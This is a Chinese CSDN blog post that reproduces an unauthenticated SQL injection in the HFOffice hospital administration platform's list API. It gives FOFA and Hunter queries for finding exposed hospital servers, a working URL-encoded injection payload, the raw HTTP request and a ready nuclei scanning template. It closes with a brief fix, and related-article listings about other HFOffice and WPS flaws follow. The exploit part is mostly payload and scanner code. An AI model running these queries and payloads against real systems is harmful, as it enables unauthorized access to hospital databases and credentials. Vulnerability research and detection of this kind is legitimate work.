【漏洞复现】HFOffice医微云SQL注入漏洞

最新推荐文章于 2024-09-03 21:17:49 发布
最新推荐文章于 2024-09-03 21:17:49 发布
阅读量679 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/134306966
版权
文章报道了红帆HFOffice医微云平台存在SQL注入漏洞,攻击者可借此获取敏感信息。复现方法通过MD5加密payload,nuclei验证给出安全建议,强调web.config中Debug值调整为0以修复漏洞。
摘要由CSDN通过智能技术生成

漏洞描述

红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。平台list接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

资产收集

fofa:”HFOffice”
hunter:web.body=”HFOffice”
 

漏洞复现

payload:

/api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7

payload是对某一列数据进行md5加密,如果回显发现转换失败的话,就说明存在SQL注入漏洞。

流量包
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Tue, 02 Mar 2021 07:52:43 GMT
If-None-Match: "aa32739fd71:0"

nuclei验证

nuclei-poc
id: HFOffice

info:
name: HFOffice-SQL
author: xxxx
severity: info
description: description
reference:
- https://
tags: tags

requests:
- raw:
- |+
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Tue, 02 Mar 2021 07:52:43 GMT
If-None-Match: "aa32739fd71:0"


matchers-condition: and
matchers:
- type: binary
part: body
binary:
- 20e580bc20273831444339424442353244303444433230303336444244383331
- type: status
status:
- 400
nuclei验证

修复意见

此漏洞是由于部分用户站点下web.config的Debug的值设置为1,导致系统存在SQL注入漏洞,只需让相关系统站点下web.config的Debug值设为0即可。

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

 

黑客大佬
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】2023HVV WPS Office 远程代码执行漏洞(RCE)
做自己喜欢的事,并将其发挥到极致!
09-08 2907
Office中的WebExtension是一种用于扩展Microsoft Office功能的技术。Office插件使第三方开发者能够在Office应用程序中集成自己的服务和功能。这些插件采用跨平台的Web技术(如HTML,CSS和JavaScript)开发,可以在不同的平台和设备上运行。简单理解就是Office内置了一个浏览器,可以解析html/javascript/css代码,本次的漏洞,就是WPS在处理WebExtension时,未能正确的处理javascript代码,造成了溢出RCE。
漏洞复现】红帆-ioffice-wssRtSyn-sql注入
知黑而守白
03-05 73
红帆HFOffice微云是广州红帆科技有限公司研发的专注疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助院移动办公落地,成就面向院管理的“智慧管理”。红帆HFOffice wssRtSyn 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
红帆HFOffice-findPass-sql注入-未公开Day漏洞复现
weixin_43167326的博客
01-21 601
红帆HFOffice是广州红帆科技有限公司研发的新一代院智慧管理云平台,它采用了一系列红帆HFOffice是广州红帆科技有限公司研发的新一代院智慧管理云平台。
漏洞复现】红帆 HFOffice list 存在SQL注入漏洞
https://blog.echo234.cn/
03-28 477
红帆HFOffice微云是广州红帆科技有限公司研发的专注疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助院移动办公落地,成就面向院管理的“智慧管理”。平台list接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
红帆HFOffice_list接口_SQL注入漏洞复现
m0_64366018的博客
01-23 436
【代码】红帆HFOffice_list接口_SQL注入漏洞复现
红帆OA(疗版)漏洞细节未授权SQL注入请求注入数据包
05-06
#### 二、SQL注入漏洞详解 SQL注入是一种常见的安全漏洞,攻击者通过将恶意SQL代码插入到应用程序的输入字段中,从而操纵数据库执行非预期的操作。红帆OA(疗版)存在未授权SQL注入的风险,这可能导致敏感信息泄露...
漏洞复现】红帆-ioffice-list-SQL注入漏洞
知黑而守白
01-17 296
红帆HFOffice微云是广州红帆科技有限公司研发的专注疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助院移动办公落地,成就面向院管理的“智慧管理”。红帆HFOffice list 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
红帆ioffice-iocomgetatt-sql注入
weixin_43567873的博客
03-11 112
红帆ioffice-iocomgetatt-sql注入
漏洞复现】红帆-ioffice-iocomgetatt-sql注入
知黑而守白
02-26 574
红帆HFOffice微云是广州红帆科技有限公司研发的专注疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助院移动办公落地,成就面向院管理的“智慧管理”。红帆HFOffice iocomGetAtt 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
漏洞复现-红帆OA系列
aming小老弟
03-15 1310
红帆OA--------------------------------------------fofa:app=“红帆-ioffice
Office噩梦公式远程代码执行漏洞
Kr的博客
09-21 2167
这几天无聊看到一个非常好玩的office远程代码执行漏洞,就来复现了一下......   影响版本: MicrosoftOffice 2000 MicrosoftOffice 2003 MicrosoftOffice 2007 Service Pack 3 MicrosoftOffice 2010 Service Pack 2 MicrosoftOffice 2013 Service Pac...
漏洞复现SQL注入漏洞
zkaqlaoniao的博客
11-09 607
红帆HFOffice微云是广州红帆科技有限公司研发的专注疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助院移动办公落地,成就面向院管理的“智慧管理”。平台list接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。此漏洞是由于部分用户站点下web.config的Debug的值设置为1,导致系统存在SQL注入漏洞,只需让相关系统站点下web.config的Debug值设为0即可。
Office2.02前台RCE分析
include_voidmain的博客
08-15 980
Office2.02前台RCE分析
Azure自建虚拟机与线下IDC和Office ASA防火墙建立ipsec,实现内网互通
欢迎光临
09-18 1065
一、环境介绍 使用libreswan实现Azure与IDC和Office内网互通 环境:【① 源和目的都为虚拟机,具体安装配置于Azures上虚拟机一致;② 其他品牌VPN网关设备】 Azure虚拟机: 内网网段:10.1.12.0/24 公网IP:52.130.186.xx 内网IP:10.1.12.4 系统版本:Centos7 IDC: 内网网段:10.161.30.0/24 公网IP:122.144.208.xx 网络设备:ASA防火墙 Office: 内网网段:192.16
gateway + websocket 实现权限校验
一只没有脚的鸟
09-03 254
gateway + websocket 实现权限校验
观测云核心技术解密:eBPF Tracing 实现原理
观测云的博客
09-03 535
通过 eBPF,开发者可以在不修改内核源码的情况下,对内核功能进行扩展和监控。eBPF Tracing 利用这一技术,对系统调用、内核函数等进行跟踪,从而实现对应用行为的深入洞察。
计算机网络-VRRP工作原理
Linux基础知识、计算机网络基础学习分享。
09-03 214
初始化状态就是在设备上配置完成时的状态,Master状态为主设备的状态,Nackup状态为备份设备的状态,备份设备会监听主设备发送的Advertisement报文,当定时器超时都没有收到主设备的报文时则备份设备切换为Master状态。R1与R2交换VRRP报文,优先级一样,通过比较接口IP地址选举Master路由器,由于R2的接口IP地址大于R1的接口IP地址,因此R2被选举为Master路由器。进行比较,先比较优先级,优先级大的优先,优先级相等则比较接口IP地址,IP地址大的优先,
网络编程学习:TCP/IP协议
kkbbaaii的博客
09-01 1383
网络编程学习:TCP/IP协议
TCP 通信程序示例——实现一个服务器连接多个客户端
最新发布
weixin_63556308的博客
09-03 587
这段代码实现了一个简单的 TCP 服务器,它在本地回环地址的 50000 端口上监听客户端连接请求。当有客户端连接时,服务器会创建一个子进程来处理与该客户端的通信。子进程会接收客户端发送的数据,并在数据后加上当前时间后发送回客户端。同时,服务器还注册了一个信号处理函数来处理子进程结束的信号,以防止产生僵尸进程。
uni-app 微信小程序分享
07-27
uni-app提供了内置的微信分享API,可以通过调用相关方法来实现微信小程序的分享功能。首先,在onLoad方法中使用wx.showShareMenu方法,设置menus将发送给朋友和分享到朋友圈两个按钮都可以点击。具体代码如下: ```javascript onLoad() { wx.showShareMenu({ withShareTicket: true, menus: \["shareAppMessage", "shareTimeline"\] }) } ``` 接下来,需要分别编写发送给朋友和分享到朋友圈的方法。这两个方法应该与data和methods等同级,不要写到methods里面。具体代码如下: ```javascript onShareAppMessage(res) { if (res.from === 'button') { console.log(res.target) } return { title: 'title', path: '/pages/hfdt/gztjh', mpId: 'wx6bf107b87c455b99' } }, onShareTimeline(res) { return { title: '胶南街道召开“红帆支部”观摩学习暨工作推进会', type: 0, summary: "" } } ``` 在onShareAppMessage方法中,可以设置分享的标题、路径和微信小程序的AppId。在onShareTimeline方法中,可以设置分享到朋友圈的标题和类型等信息。通过以上步骤,就可以实现uni-app微信小程序的分享功能。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [uniapp 微信分享](https://blog.csdn.net/lxgyydsgod/article/details/126234984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [uniapp微信小程序使用分享功能](https://blog.csdn.net/qq_43080548/article/details/125619531)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值